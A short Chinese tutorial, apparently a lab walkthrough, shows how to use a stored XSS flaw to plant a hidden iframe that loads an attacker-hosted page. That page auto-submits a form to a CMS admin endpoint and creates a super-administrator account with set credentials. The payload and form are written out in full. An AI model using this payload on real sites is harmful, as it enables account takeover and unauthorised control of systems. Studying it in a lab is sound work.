xss利用之创建超级管理员账户
-
首先需要声明的是,我们这次讲解的小案例是开源的一个环境,并不是盲打xss,也就是说我们是可以在自己的服务器上搭建环境而后进行一系列的测试
-
现我们在靶场找到存储型(持久型)xss注入,我们该如何通过xss创建账户呢?
-
首先我们在本地创建一个新的管理员账户,而后使用火狐浏览器查看头信息以及payload
-
-
-
-
通过观察我们可以看到我们提交的内容,我们可以通过模仿form表单进行提交,接下来我们将会使用到
-
<iframe src="http://10.10.87.220/xss.html" width="0" height="0"></iframe> 将此payload插入到执行代码,会执行我们指定的html脚本
-
<form action="http://www.baji.com/jj/admin.php?c=a_adminuser&a=add&run=1" name="form1" method="post"> <input type="hidden" name="auid" value=""> <input type="hidden" name="auser" value="text"> <input type="hidden" name="apass" value="text212121"> <input type="hidden" name="gid" value="1"> <input type="hidden" name="level" value="1"> <input type="hidden" name="aname" value=""> <input type="hidden" name="amail" value=""> <input type="hidden" name="atel" value=""> <button type="submit" name="ok">ok</button> </form> <script> document.form1.submit(); </script>
-
-
-
超级管理员添加成功了,但是在实验的过程中发现很多时候代码执行但是超级管理员并没有添加,在多次刷新之后才出来,建议大家关闭浏览器重新打开或者清理一下浏览器缓存